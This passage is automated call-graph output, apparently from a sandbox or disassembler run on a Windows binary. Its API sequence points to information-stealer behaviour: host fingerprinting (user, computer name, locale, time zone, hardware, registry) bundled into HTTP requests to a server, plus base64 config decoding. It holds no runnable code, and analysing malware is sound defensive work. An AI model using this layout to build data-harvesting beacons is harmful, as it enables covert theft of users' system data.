lstrcpy 72424->72425 72426 40448d 72425->72426 72427 40fd00 lstrcpy 72426->72427 72428 4044a1 72427->72428 72429 40fd00 lstrcpy 72428->72429 72430 4044b2 72429->72430 72431 40fd00 lstrcpy 72430->72431 72432 4044c3 72431->72432 72433 40fd00 lstrcpy 72432->72433 72434 4044d4 72433->72434 72435 4044e9 InternetOpenA StrCmpCA 72434->72435 72436 404514 72435->72436 72437 404a88 InternetCloseHandle 72436->72437 73391 411330 72436->73391 72451 404a9a 72437->72451 72439 40452e 72440 40fe30 2 API calls 72439->72440 72441 404542 72440->72441 72442 40fde0 lstrcpy 72441->72442 72443 40454f 72442->72443 72444 40fec0 3 API calls 72443->72444 72445 404577 72444->72445 72446 40fde0 lstrcpy 72445->72446 72447 404584 72446->72447 72448 40fec0 3 API calls 72447->72448 72449 4045a0 72448->72449 72450 40fde0 lstrcpy 72449->72450 72452 4045ad 72450->72452 72451->71546 72453 40fe30 2 API calls 72452->72453 72454 4045c8 72453->72454 72455 40fde0 lstrcpy 72454->72455 72456 4045d5 72455->72456 72457 40fec0 3 API calls 72456->72457 72458 4045f1 72457->72458 72459 40fde0 lstrcpy 72458->72459 72460 4045fe 72459->72460 72461 40fec0 3 API calls 72460->72461 72462 40461a 72461->72462 72463 40fde0 lstrcpy 72462->72463 72464 404627 72463->72464 72465 40fec0 3 API calls 72464->72465 72466 404644 72465->72466 72467 40fe30 2 API calls 72466->72467 72468 404657 72467->72468 72469 40fde0 lstrcpy 72468->72469 72470 404664 72469->72470 72471 40467b InternetConnectA 72470->72471 72471->72437 72472 4046a7 HttpOpenRequestA 72471->72472 72473 4046e5 72472->72473 72474 404a7b InternetCloseHandle 72472->72474 72475 404701 72473->72475 72476 4046eb InternetSetOptionA 72473->72476 72474->72437 72477 40fec0 3 API calls 72475->72477 72476->72475 72478 404712 72477->72478 72479 40fde0 lstrcpy 72478->72479 72480 40471f 72479->72480 72481 40fe30 2 API calls 72480->72481 72482 40473a 72481->72482 72483 40fde0 lstrcpy 72482->72483 72484 404747 72483->72484 72485 40fec0 3 API calls 72484->72485 72486 404763 72485->72486 72487 40fde0 lstrcpy 72486->72487 72488 404770 72487->72488 72489 40fec0 3 API calls 72488->72489 72490 40478e 72489->72490 72491 40fde0 lstrcpy 72490->72491 72492 40479b 72491->72492 72493 40fec0 3 API calls 72492->72493 72494 4047b7 72493->72494 72495 40fde0 lstrcpy 72494->72495 72496 4047c4 72495->72496 72497 40fec0 3 API calls 72496->72497 72498 4047e0 72497->72498 72499 40fde0 lstrcpy 72498->72499 72500 4047ed 72499->72500 72501 40fe30 2 API calls 72500->72501 72502 404808 72501->72502 72503 40fde0 lstrcpy 72502->72503 72504 404815 72503->72504 72505 40fec0 3 API calls 72504->72505 72506 404831 72505->72506 72507 40fde0 lstrcpy 72506->72507 72508 40483e 72507->72508 72509 40fec0 3 API calls 72508->72509 72510 40485a 72509->72510 72511 40fde0 lstrcpy 72510->72511 72512 404867 72511->72512 72513 40fe30 2 API calls 72512->72513 72514 404882 72513->72514 72515 40fde0 lstrcpy 72514->72515 72516 40488f 72515->72516 72517 40fec0 3 API calls 72516->72517 72518 4048ab 72517->72518 72519 40fde0 lstrcpy 72518->72519 72520 4048b8 72519->72520 72521 40fec0 3 API calls 72520->72521 72522 4048d6 72521->72522 72523 40fde0 lstrcpy 72522->72523 72524 4048e3 72523->72524 72525 40fec0 3 API calls 72524->72525 72526 4048ff 72525->72526 72527 40fde0 lstrcpy 72526->72527 72528 40490c 72527->72528 72529 40fec0 3 API calls 72528->72529 72530 404928 72529->72530 72531 40fde0 lstrcpy 72530->72531 72532 404935 72531->72532 72533 40fe30 2 API calls 72532->72533 72534 404950 72533->72534 72535 40fde0 lstrcpy 72534->72535 72536 40495d 72535->72536 72537 40fd00 lstrcpy 72536->72537 72538 404975 72537->72538 72539 40fe30 2 API calls 72538->72539 72540 404989 72539->72540 72541 40fe30 2 API calls 72540->72541 72542 40499c 72541->72542 72543 40fde0 lstrcpy 72542->72543 72544 4049a9 72543->72544 72545 4049c9 lstrlenA 72544->72545 72546 4049d9 72545->72546 72547 4049e2 lstrlenA 72546->72547 73397 40ffa0 72547->73397 72549 4049f2 HttpSendRequestA InternetReadFile 72550 404a15 72549->72550 72551 404a69 InternetCloseHandle 72549->72551 72550->72551 72555 404a1c 72550->72555 73398 40fd80 72551->73398 72553 40fec0 3 API calls 72553->72555 72554 40fde0 lstrcpy 72554->72555 72555->72553 72555->72554 72556 404a4e InternetReadFile 72555->72556 72556->72550 72556->72551 73402 40ffa0 72557->73402 72559 4126a7 StrCmpCA 72560 4126b2 ExitProcess 72559->72560 72561 4126b9 72559->72561 72562 4126c9 strtok_s 72561->72562 72563 41281b 72562->72563 72569 4126da 72562->72569 72563->71548 72564 4127ff strtok_s 72564->72563 72564->72569 72565 4127b1 StrCmpCA 72565->72564 72566 412710 StrCmpCA 72566->72564 72566->72569 72567 412772 StrCmpCA 72567->72564 72567->72569 72568 4126f4 StrCmpCA 72568->72564 72568->72569 72569->72564 72569->72565 72569->72566 72569->72567 72569->72568 72570 412787 StrCmpCA 72569->72570 72571 4127c7 StrCmpCA 72569->72571 72572 412748 StrCmpCA 72569->72572 72573 4127eb StrCmpCA 72569->72573 72574 41272c StrCmpCA 72569->72574 72575 41279c StrCmpCA 72569->72575 72576 40fd90 2 API calls 72569->72576 72570->72564 72570->72569 72571->72564 72572->72564 72572->72569 72573->72564 72574->72564 72574->72569 72575->72564 72575->72569 72576->72569 72578 40fd40 lstrcpy 72577->72578 72579 405c00 72578->72579 72580 404350 5 API calls 72579->72580 72581 405c0c 72580->72581 72582 40fd00 lstrcpy 72581->72582 72583 405c2d 72582->72583 72584 40fd00 lstrcpy 72583->72584 72585 405c41 72584->72585 72586 40fd00 lstrcpy 72585->72586 72587 405c52 72586->72587 72588 40fd00 lstrcpy 72587->72588 72589 405c63 72588->72589 72590 40fd00 lstrcpy 72589->72590 72591 405c74 72590->72591 72592 405c89 InternetOpenA StrCmpCA 72591->72592 72593 405cb4 72592->72593 72594 40639f InternetCloseHandle 72593->72594 72595 411330 2 API calls 72593->72595 72596 4063b5 72594->72596 72597 405cce 72595->72597 73409 406e30 CryptStringToBinaryA 72596->73409 72598 40fe30 2 API calls 72597->72598 72600 405ce2 72598->72600 72602 40fde0 lstrcpy 72600->72602 72601 4063bb 72603 40fd90 2 API calls 72601->72603 72618 4063e9 72601->72618 72606 405cef 72602->72606 72604 4063ce 72603->72604 72605 40fec0 3 API calls 72604->72605 72607 4063dd 72605->72607 72609 40fec0 3 API calls 72606->72609 72608 40fde0 lstrcpy 72607->72608 72608->72618 72610 405d17 72609->72610 72611 40fde0 lstrcpy 72610->72611 72612 405d24 72611->72612 72613 40fec0 3 API calls 72612->72613 72614 405d40 72613->72614 72615 40fde0 lstrcpy 72614->72615 72616 405d4d 72615->72616 72617 40fe30 2 API calls 72616->72617 72619 405d68 72617->72619 72618->71554 72620 40fde0 lstrcpy 72619->72620 72621 405d75 72620->72621 72622 40fec0 3 API calls 72621->72622 72623 405d91 72622->72623 72624 40fde0 lstrcpy 72623->72624 72625 405d9e 72624->72625 72626 40fec0 3 API calls 72625->72626 72627 405dba 72626->72627 72628 40fde0 lstrcpy 72627->72628 72629 405dc7 72628->72629 72630 40fec0 3 API calls 72629->72630 72631 405de4 72630->72631 72632 40fe30 2 API calls 72631->72632 72633 405df7 72632->72633 72634 40fde0 lstrcpy 72633->72634 72635 405e04 72634->72635 72636 405e1b InternetConnectA 72635->72636 72637 405e47 HttpOpenRequestA 72636->72637 72638 40639c 72636->72638 72639 406395 InternetCloseHandle 72637->72639 72640 405e85 72637->72640 72638->72594 72639->72638 72641 405ea1 72640->72641 72642 405e8b InternetSetOptionA 72640->72642 72643 40fec0 3 API calls 72641->72643 72642->72641 72644 405eb2 72643->72644 72645 40fde0 lstrcpy 72644->72645 72646 405ebf 72645->72646 72647 40fe30 2 API calls 72646->72647 72648 405eda 72647->72648 72649 40fde0 lstrcpy 72648->72649 72650 405ee7 72649->72650 72651 40fec0 3 API calls 72650->72651 72652 405f03 72651->72652 72653 40fde0 lstrcpy 72652->72653 72654 405f10 72653->72654 72655 40fec0 3 API calls 72654->72655 72656 405f2d 72655->72656 72657 40fde0 lstrcpy 72656->72657 72658 405f3a 72657->72658 72659 40fec0 3 API calls 72658->72659 72660 405f58 72659->72660 72661 40fde0 lstrcpy 72660->72661 72662 405f65 72661->72662 72663 40fec0 3 API calls 72662->72663 72664 405f81 72663->72664 72665 40fde0 lstrcpy 72664->72665 72666 405f8e 72665->72666 72667 40fe30 2 API calls 72666->72667 72668 405fa9 72667->72668 72669 40fde0 lstrcpy 72668->72669 72670 405fb6 72669->72670 72671 40fec0 3 API calls 72670->72671 72672 405fd2 72671->72672 72673 40fde0 lstrcpy 72672->72673 72674 405fdf 72673->72674 72675 40fec0 3 API calls 72674->72675 72676 405ffb 72675->72676 72677 40fde0 lstrcpy 72676->72677 72678 406008 72677->72678 72679 40fe30 2 API calls 72678->72679 72680 406023 72679->72680 72681 40fde0 lstrcpy 72680->72681 72682 406030 72681->72682 72683 40fec0 3 API calls 72682->72683 72684 40604c 72683->72684 72685 40fde0 lstrcpy 72684->72685 72686 406059 72685->72686 72687 40fec0 3 API calls 72686->72687 72688 406076 72687->72688 72689 40fde0 lstrcpy 72688->72689 72690 406083 72689->72690 72691 40fec0 3 API calls 72690->72691 72692 40609f 72691->72692 72693 40fde0 lstrcpy 72692->72693 72694 4060ac 72693->72694 72695 40fec0 3 API calls 72694->72695 72696 4060c8 72695->72696 72697 40fde0 lstrcpy 72696->72697 72698 4060d5 72697->72698 72699 402370 lstrcpy 72698->72699 72700 4060e9 72699->72700 72701 40fe30 2 API calls 72700->72701 72702 4060fd 72701->72702 72703 40fde0 lstrcpy 72702->72703 72704 40610a 72703->72704 72705 40fec0 3 API calls 72704->72705 72706 406132 72705->72706 72707 40fde0 lstrcpy 72706->72707 72708 40613f 72707->72708 72709 40fec0 3 API calls 72708->72709 72710 40615b 72709->72710 72711 40fde0 lstrcpy 72710->72711 72712 406168 72711->72712 72713 40fe30 2 API calls 72712->72713 72714 406183 72713->72714 72715 40fde0 lstrcpy 72714->72715 72716 406190 72715->72716 72717 40fec0 3 API calls 72716->72717 72718 4061ac 72717->72718 72719 40fde0 lstrcpy 72718->72719 72720 4061b9 72719->72720 72721 40fec0 3 API calls 72720->72721 72722 4061d7 72721->72722 72723 40fde0 lstrcpy 72722->72723 72724 4061e4 72723->72724 72725 40fec0 3 API calls 72724->72725 72726 406200 72725->72726 72727 40fde0 lstrcpy 72726->72727 72728 40620d 72727->72728 72729 40fec0 3 API calls 72728->72729 72730 406229 72729->72730 72731 40fde0 lstrcpy 72730->72731 72732 406236 72731->72732 72733 40fe30 2 API calls 72732->72733 72734 406251 72733->72734 72735 40fde0 lstrcpy 72734->72735 72736 40625e 72735->72736 72737 406271 lstrlenA 72736->72737 73403 40ffa0 72737->73403 72739 406282 lstrlenA GetProcessHeap HeapAlloc 73404 40ffa0 72739->73404 72741 4062a5 lstrlenA 73405 40ffa0 72741->73405 72743 4062b5 memcpy 73406 40ffa0 72743->73406 72745 4062c7 lstrlenA 72746 4062d7 72745->72746 72747 4062e0 lstrlenA memcpy 72746->72747 73407 40ffa0 72747->73407 72749 4062fc lstrlenA 73408 40ffa0 72749->73408 72751 40630c HttpSendRequestA InternetReadFile 72752 406388 InternetCloseHandle 72751->72752 72754 406332 72751->72754 72752->72639 72753 40fec0 3 API calls 72753->72754 72754->72752 72754->72753 72755 40fde0 lstrcpy 72754->72755 72756 40636d InternetReadFile 72754->72756 72755->72754 72756->72752 72756->72754 73414 40ffa0 72757->73414 72759 41205f strtok_s 72760 4120c9 72759->72760 72763 41206c 72759->72763 72760->71556 72761 40fd90 2 API calls 72762 4120b2 strtok_s 72761->72762 72762->72760 72762->72763 72763->72761 72763->72762 72764 40fd90 2 API calls 72763->72764 72764->72763 73415 40ffa0 72765->73415 72767 411eaf strtok_s 72773 411fdd 72767->72773 72775 411ec0 72767->72775 72768 411fc2 strtok_s 72768->72773 72768->72775 72769 411f94 StrCmpCA 72769->72775 72770 411ef6 StrCmpCA 72770->72775 72771 411f68 StrCmpCA 72771->72775 72772 411f3c StrCmpCA 72772->72775 72773->71564 72774 40fd90 lstrlenA lstrcpy 72774->72775 72775->72768 72775->72769 72775->72770 72775->72771 72775->72772 72775->72774 72777 40fd00 lstrcpy 72776->72777 72778 415563 72777->72778 72779 40fec0 3 API calls 72778->72779 72780 415579 72779->72780 72781 40fde0 lstrcpy 72780->72781 72782 415586 72781->72782 73416 402340 72782->73416 72785 40fe30 2 API calls 72786 4155ae 72785->72786 72787 40fde0 lstrcpy 72786->72787 72788 4155bb 72787->72788 72789 40fec0 3 API calls 72788->72789 72790 4155e3 72789->72790 72791 40fde0 lstrcpy 72790->72791 72792 4155f0 72791->72792 72793 40fec0 3 API calls 72792->72793 72794 41560c 72793->72794 72795 40fde0 lstrcpy 72794->72795 72796 415619 72795->72796 72797 40fec0 3 API calls 72796->72797 72798 415635 72797->72798 72799 40fde0 lstrcpy 72798->72799 72800 415642 72799->72800 73419 410180 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 72800->73419 72802 415652 72803 40fec0 3 API calls 72802->72803 72804 41565f 72803->72804 72805 40fde0 lstrcpy 72804->72805 72806 41566c 72805->72806 72807 40fec0 3 API calls 72806->72807 72808 415688 72807->72808 72809 40fde0 lstrcpy 72808->72809 72810 415695 72809->72810 72811 40fec0 3 API calls 72810->72811 72812 4156b1 72811->72812 72813 40fde0 lstrcpy 72812->72813 72814 4156be 72813->72814 73420 410b10 memset RegOpenKeyExA 72814->73420 72816 4156ce 72817 40fec0 3 API calls 72816->72817 72818 4156db 72817->72818 72819 40fde0 lstrcpy 72818->72819 72820 4156e8 72819->72820 72821 40fec0 3 API calls 72820->72821 72822 415704 72821->72822 72823 40fde0 lstrcpy 72822->72823 72824 415711 72823->72824 72825 40fec0 3 API calls 72824->72825 72826 41572d 72825->72826 72827 40fde0 lstrcpy 72826->72827 72828 41573a 72827->72828 72829 410bb0 2 API calls 72828->72829 72830 41574e 72829->72830 72831 40fe30 2 API calls 72830->72831 72832 415762 72831->72832 72833 40fde0 lstrcpy 72832->72833 72834 41576f 72833->72834 72835 40fec0 3 API calls 72834->72835 72836 415797 72835->72836 72837 40fde0 lstrcpy 72836->72837 72838 4157a4 72837->72838 72839 40fec0 3 API calls 72838->72839 72840 4157c0 72839->72840 72841 40fde0 lstrcpy 72840->72841 72842 4157cd 72841->72842 72843 410c10 12 API calls 72842->72843 72844 4157e1 72843->72844 72845 40fe30 2 API calls 72844->72845 72846 4157f5 72845->72846 72847 40fde0 lstrcpy 72846->72847 72848 415802 72847->72848 72849 40fec0 3 API calls 72848->72849 72850 41582a 72849->72850 72851 40fde0 lstrcpy 72850->72851 72852 415837 72851->72852 72853 40fec0 3 API calls 72852->72853 72854 415853 72853->72854 72855 40fde0 lstrcpy 72854->72855 72856 415860 72855->72856 72857 41586b GetCurrentProcessId 72856->72857 73424 4118a0 OpenProcess 72857->73424 72860 40fe30 2 API calls 72861 41588f 72860->72861 72862 40fde0 lstrcpy 72861->72862 72863 41589c 72862->72863 72864 40fec0 3 API calls 72863->72864 72865 4158c4 72864->72865 72866 40fde0 lstrcpy 72865->72866 72867 4158d1 72866->72867 72868 40fec0 3 API calls 72867->72868 72869 4158ed 72868->72869 72870 40fde0 lstrcpy 72869->72870 72871 4158fa 72870->72871 72872 40fec0 3 API calls 72871->72872 72873 415916 72872->72873 72874 40fde0 lstrcpy 72873->72874 72875 415923 72874->72875 72876 40fec0 3 API calls 72875->72876 72877 41593f 72876->72877 72878 40fde0 lstrcpy 72877->72878 72879 41594c 72878->72879 73429 410dc0 GetProcessHeap HeapAlloc 72879->73429 72881 41595c 72882 40fec0 3 API calls 72881->72882 72883 415969 72882->72883 72884 40fde0 lstrcpy 72883->72884 72885 415976 72884->72885 72886 40fec0 3 API calls 72885->72886 72887 415992 72886->72887 72888 40fde0 lstrcpy 72887->72888 72889 41599f 72888->72889 72890 40fec0 3 API calls 72889->72890 72891 4159bb 72890->72891 72892 40fde0 lstrcpy 72891->72892 72893 4159c8 72892->72893 73436 410f00 CoInitializeEx CoInitializeSecurity CoCreateInstance 72893->73436 72895 4159dc 72896 40fe30 2 API calls 72895->72896 72897 4159f0 72896->72897 72898 40fde0 lstrcpy 72897->72898 72899 4159fd 72898->72899 72900 40fec0 3 API calls 72899->72900 72901 415a25 72900->72901 72902 40fde0 lstrcpy 72901->72902 72903 415a32 72902->72903 72904 40fec0 3 API calls 72903->72904 72905 415a4e 72904->72905 72906 40fde0 lstrcpy 72905->72906 72907 415a5b 72906->72907 73450 4110c0 CoInitializeEx CoInitializeSecurity CoCreateInstance 72907->73450 72909 415a6f 72910 40fe30 2 API calls 72909->72910 72911 415a83 72910->72911 72912 40fde0 lstrcpy 72911->72912 72913 415a90 72912->72913 72914 40fec0 3 API calls 72913->72914 72915 415ab8 72914->72915 72916 40fde0 lstrcpy 72915->72916 72917 415ac5 72916->72917 72918 40fec0 3 API calls 72917->72918 72919 415ae1 72918->72919 72920 40fde0 lstrcpy 72919->72920 72921 415aee 72920->72921 73464 410140 GetProcessHeap HeapAlloc GetComputerNameA 72921->73464 72924 40fec0 3 API calls 72925 415b0b 72924->72925 72926 40fde0 lstrcpy 72925->72926 72927 415b18 72926->72927 72928 40fec0 3 API calls 72927->72928 72929 415b34 72928->72929 72930 40fde0 lstrcpy 72929->72930 72931 415b41 72930->72931 72932 40fec0 3 API calls 72931->72932 72933 415b5d 72932->72933 72934 40fde0 lstrcpy 72933->72934 72935 415b6a 72934->72935 73466 410100 GetProcessHeap HeapAlloc GetUserNameA 72935->73466 72937 415b7a 72938 40fec0 3 API calls 72937->72938 72939 415b87 72938->72939 72940 40fde0 lstrcpy 72939->72940 72941 415b94 72940->72941 72942 40fec0 3 API calls 72941->72942 72943 415bb0 72942->72943 72944 40fde0 lstrcpy 72943->72944 72945 415bbd 72944->72945 72946 40fec0 3 API calls 72945->72946 72947 415bd9 72946->72947 72948 40fde0 lstrcpy 72947->72948 72949 415be6 72948->72949 73467 410a90 7 API calls 72949->73467 72952 40fe30 2 API calls 72953 415c0e 72952->72953 72954 40fde0 lstrcpy 72953->72954 72955 415c1b 72954->72955 72956 40fec0 3 API calls 72955->72956 72957 415c43 72956->72957 72958 40fde0 lstrcpy 72957->72958 72959 415c50 72958->72959 72960 40fec0 3 API calls 72959->72960 72961 415c6c 72960->72961 72962 40fde0 lstrcpy 72961->72962 72963 415c79 72962->72963 73470 410250 72963->73470 72966 40fe30 2 API calls 72967 415ca4 72966->72967 72968 40fde0 lstrcpy 72967->72968 72969 415cb1 72968->72969 72970 40fec0 3 API calls 72969->72970 72971 415cdf 72970->72971 72972 40fde0 lstrcpy 72971->72972 72973 415cec 72972->72973 72974 40fec0 3 API calls 72973->72974 72975 415d0b 72974->72975 72976 40fde0 lstrcpy 72975->72976 72977 415d18 72976->72977 73480 410180 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 72977->73480 72979 415d28 72980 40fec0 3 API calls 72979->72980 72981 415d35 72980->72981 72982 40fde0 lstrcpy 72981->72982 72983 415d42 72982->72983 72984 40fec0 3 API calls 72983->72984 72985 415d61 72984->72985 72986 40fde0 lstrcpy 72985->72986 72987 415d6e 72986->72987 72988 40fec0 3 API calls 72987->72988 72989 415d90 72988->72989 72990 40fde0 lstrcpy 72989->72990 72991 415d9d 72990->72991 73481 4101e0 GetProcessHeap HeapAlloc GetTimeZoneInformation 72991->73481 72994 40fec0 3 API calls 72995 415dc0 72994->72995 72996 40fde0 lstrcpy 72995->72996 72997 415dcd 72996->72997 72998 40fec0 3 API calls 72997->72998 72999 415def 72998->72999 73000 40fde0 lstrcpy 72999->73000 73001 415dfc 73000->73001 73002 40fec0 3 API calls 73001->73002 73003 415e1e 73002->73003 73004 40fde0 lstrcpy 73003->73004 73005 415e2b 73004->73005 73006 40fec0 3 API calls 73005->73006 73007 415e4d 73006->73007 73008 40fde0 lstrcpy 73007->73008 73009 415e5a 73008->73009 73484 4103b0 GetProcessHeap HeapAlloc RegOpenKeyExA 73009->73484 73012 40fec0 3 API calls 73013 415e7d 73012->73013 73014 40fde0 lstrcpy 73013->73014 73015 415e8a 73014->73015 73016 40fec0 3 API calls 73015->73016 73017 415eac 73016->73017 73018 40fde0 lstrcpy 73017->73018 73019 415eb9 73018->73019 73020 40fec0 3 API calls 73019->73020 73021 415ed8 73020->73021 73022 40fde0 lstrcpy 73021->73022 73023 415ee5 73022->73023 73487 410460 GetLogicalProcessorInformationEx 73023->73487 73025 415ef5 73026 40fec0 3 API calls 73025->73026 73027 415f02 73026->73027 73028 40fde0 lstrcpy 73027->73028 73029 415f0f 73028->73029 73030 40fec0 3 API calls 73029->73030 73031 415f2e 73030->73031 73032 40fde0 lstrcpy 73031->73032 73033 415f3b 73032->73033 73034 40fec0 3 API calls 73033->73034 73035 415f5a 73034->73035 73036 40fde0 lstrcpy 73035->73036 73037 415f67 73036->73037 73503 410420 GetSystemInfo wsprintfA 73037->73503 73039 415f77 73040 40fec0 3 API calls 73039->73040 73041 415f84 73040->73041 73042 40fde0 lstrcpy 73041->73042 73043 415f91 73042->73043 73044 40fec0 3 API calls 73043->73044 73045 415fb0 73044->73045 73046 40fde0 lstrcpy 73045->73046 73047 415fbd 73046->73047 73048 40fec0 3 API calls 73047->73048 73049 415fdc 73048->73049 73050 40fde0 lstrcpy 73049->73050 73051 415fe9 73050->73051 73504 410560 GetProcessHeap HeapAlloc 73051->73504 73053 415ff9 73054 40fec0 3 API calls 73053->73054 73055 416006 73054->73055 73056 40fde0 lstrcpy 73055->73056 73057 416013 73056->73057 73058 40fec0 3 API calls 73057->73058 73059 416032 73058->73059 73060 40fde0 lstrcpy 73059->73060 73061 41603f 73060->73061 73062 40fec0 3 API calls 73061->73062 73063 416061 73062->73063 73064 40fde0 lstrcpy 73063->73064 73065 41606e 73064->73065 73066 40fec0 3 API calls 73065->73066 73067 416090 73066->73067 73068 40fde0 lstrcpy 73067->73068 73069 41609d 73068->73069 73509 4105d0 73069->73509 73072 40fe30 2 API calls 73073 4160ce 73072->73073 73074 40fde0 lstrcpy 73073->73074 73075 4160db 73074->73075 73076 40fec0 3 API calls 73075->73076 73077 41610c 73076->73077 73078 40fde0 lstrcpy 73077->73078 73079 416119 73078->73079 73080 40fec0 3 API calls 73079->73080 73081 41613b 73080->73081 73082 40fde0 lstrcpy 73081->73082 73083 416148 73082->73083 73517 410980 73083->73517 73085 416162 73086 40fe30 2 API calls 73085->73086 73087 416179 73086->73087 73088 40fde0 lstrcpy 73087->73088 73089 416186 73088->73089 73090 40fec0 3 API calls 73089->73090 73091 4161b7 73090->73091 73092 40fde0 lstrcpy 73091->73092 73093 4161c4 73092->73093 73094 40fec0 3 API calls 73093->73094 73095 4161e6 73094->73095 73096 40fde0 lstrcpy 73095->73096 73097 4161f3 73096->73097 73526 4106e0 73097->73526 73099 416212 73100 40fe30 2 API calls 73099->73100 73101 416229 73100->73101 73102 40fde0 lstrcpy 73101->73102 73103 416236 73102->73103 73104 4106e0 13 API calls 73103->73104 73105 416264 73104->73105 73106 40fe30 2 API calls 73105->73106 73107 41627b 73106->73107 73108 40fde0 lstrcpy 73107->73108 73109 416288 73108->73109 73110 40fec0 3 API calls 73109->73110 73111 4162b6 73110->73111 73112 40fde0 lstrcpy 73111->73112 73113 4162c3 73112->73113 73114 4162d6 lstrlenA 73113->73114 73115 4162e6 73114->73115 73116 40fd00 lstrcpy 73115->73116 73117 4162fc 73116->73117 73118 401060 lstrcpy 73117->73118 73119 416314 73118->73119 73543 4152b0 73119->73543 73121 416320 73121->71568 73123 40fd40 lstrcpy 73122->73123 73124 404b59 73123->73124 73125 404350 5 API calls 73124->73125 73126 404b65 GetProcessHeap RtlAllocateHeap 73125->73126 73802 40ffa0 73126->73802 73128 404b9f InternetOpenA StrCmpCA 73129 404bc0 73128->73129 73130 404d28 InternetCloseHandle 73129->73130 73131 404bce InternetConnectA 73129->73131 73138 404d3b 73130->73138 73132 404bf4 HttpOpenRequestA 73131->73132 73133 404d1e InternetCloseHandle 73131->73133 73134 404d14 InternetCloseHandle 73132->73134 73135 404c2c 73132->73135 73133->73130 73134->73133 73136 404c30 InternetSetOptionA 73135->73136 73137 404c49 HttpSendRequestA HttpQueryInfoA 73135->73137 73136->73137 73139 404c7e 73137->73139 73140 404cb1 73137->73140 73138->71574 73139->71574 73140->73139 73141 404d11 73140->73141 73142 404cd0 InternetReadFile 73140->73142 73141->73134 73142->73140 73142->73141 73803 406c80 73143->73803 73145 40ea6d 73146 40fd40 lstrcpy 73145->73146 73147 40ea85 73146->73147 73148 40fd40 lstrcpy 73147->73148 73150 40ea95 73148->73150 73149 40e85f StrCmpCA 73177 40e830 73149->73177 73151 40fd40 lstrcpy 73150->73151 73154 40eab1 73151->73154 73152 401060 lstrcpy 73152->73177 73153 40e8e4 StrCmpCA 73153->73177 74019 40c2d0 8 API calls 73154->74019 73156 40fd00 lstrcpy 73156->73177 73157 40eb02 73159 40fd40 lstrcpy 73157->73159 73158 40ea0b StrCmpCA 73158->73177 73160 40eb15 73159->73160 73162 40fd40 lstrcpy 73160->73162 73164 40eb25 73162->73164 73163 40fe30 2 API calls 73163->73177 73165 40fd40 lstrcpy 73164->73165 73167 40fec0 lstrlenA lstrcpy lstrcat 73167->73177 73169 40fde0 lstrcpy 73169->73177 73175 40fd40 lstrcpy 73175->73177 73177->73145 73177->73149 73177->73152 73177->73153 73177->73156 73177->73158 73177->73163 73177->73167 73177->73169 73177->73175 73807 40dea0 73177->73807 73859 40e1d0 73177->73859 73972 40ba40 73177->73972 73357 40fd00 lstrcpy 73356->73357 73358 4023eb 73357->73358 73358->72382 73359->72382 73360->72382 73361->72382 73362->72382 73363->72358 73364->72372 73365->72336 73366->72359 73367->72312 73368->72335 73369->72298 73370->72314 73372 40fd00 lstrcpy 73371->73372 73373 40241b 73372->73373 73373->72287 73374->72297 73376 410bd2 73375->73376 73377 410be4 73375->73377 73379 40fd00 lstrcpy 73376->73379 73378 40fd00 lstrcpy 73377->73378 73380 410bf0 73378->73380 73381 410bdd 73379->73381 73380->72411 73381->72411 73382->72415 73384 404380 73383->73384 73384->73384 73385 404387 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 73384->73385 73400 40ffa0 73385->73400 73387 4043d5 lstrlenA 73401 40ffa0 73387->73401 73389 4043e5 InternetCrackUrlA 73390 40440a 73389->73390 73390->72424 73392 40fd00 lstrcpy 73391->73392 73393 411365 73392->73393 73394 40fd00 lstrcpy 73393->73394 73395 41137e GetSystemTime 73394->73395 73396 41139d 73395->73396 73396->72439 73397->72549 73399 40fd88 73398->73399 73399->72474 73400->73387 73401->73389 73402->72559 73403->72739 73404->72741 73405->72743 73406->72745 73407->72749 73408->72751 73410 406e61 LocalAlloc 73409->73410 73411 406e9b 73409->73411 73410->73411 73412 406e72 CryptStringToBinaryA 73410->73412 73411->72601 73412->73411 73413 406e89 LocalFree 73412->73413 73413->72601 73414->72759 73415->72767 73417 40fd00 lstrcpy 73416->73417 73418 40235b 73417->73418 73418->72785 73419->72802 73421 410b7a CharToOemA 73420->73421 73422 410b5c RegQueryValueExA 73420->73422 73421->72816 73422->73421 73425 4118e4 73424->73425 73426 4118c8 K32GetModuleFileNameExA CloseHandle 73424->73426 73427 40fd00 lstrcpy 73425->73427 73426->73425 73428 4118f5 73427->73428 73428->72860 73558 410080 GetProcessHeap HeapAlloc RegOpenKeyExA 73429->73558 73431 410de9 73432 410df0 73431->73432 73433 410dfa RegOpenKeyExA 73431->73433 73432->72881 73434 410e32 73433->73434 73435 410e1b RegQueryValueExA 73433->73435 73434->72881 73435->73434 73437 410f71 73436->73437 73438 41108e 73437->73438 73439 410f79 CoSetProxyBlanket 73437->73439 73440 40fd00 lstrcpy 73438->73440 73441 410fac 73439->73441 73442 4110a4 73440->73442 73441->73438 73443 410fb4 73441->73443 73442->72895 73443->73442 73444 410fe2 VariantInit 73443->73444 73445 411006 73444->73445 73561 410e50 CoCreateInstance 73445->73561 73447 411015 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 73448 40fd00 lstrcpy 73447->73448 73449 411073 VariantClear 73448->73449 73449->72895 73451 411131 73450->73451 73452 411139 CoSetProxyBlanket 73451->73452 73453 4111f4 73451->73453 73455 41116c 73452->73455 73454 40fd00 lstrcpy 73453->73454 73456 41120a 73454->73456 73455->73453 73457 411174 73455->73457 73456->72909 73457->73456 73458 41119e VariantInit 73457->73458 73459 4111c2 73458->73459 73567 4114d0 LocalAlloc CharToOemW 73459->73567 73461 4111cb 73462 40fd00 lstrcpy 73461->73462 73463 4111d9 VariantClear 73462->73463 73463->72909 73465 410176 73464->73465 73465->72924 73466->72937 73468 40fd00 lstrcpy 73467->73468 73469 410b03 73468->73469 73469->72952 73471 40fd00 lstrcpy 73470->73471 73472 410288 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 73471->73472 73473 410382 73472->73473 73479 4102c7 73472->73479 73475 410390 73473->73475 73476 410389 LocalFree 73473->73476 73474 4102d0 GetLocaleInfoA 73474->73479 73475->72966 73476->73475 73477 40fec0 lstrlenA lstrcpy lstrcat 73477->73479 73478 40fde0 lstrcpy 73478->73479 73479->73473 73479->73474 73479->73477 73479->73478 73480->72979 73482 410212 wsprintfA 73481->73482 73483 41023b 73481->73483 73482->73483 73483->72994 73485 4103f5 RegQueryValueExA 73484->73485 73486 41040c 73484->73486 73485->73486 73486->73012 73488 4104d2 73487->73488 73492 41048c 73487->73492 73570 4112d0 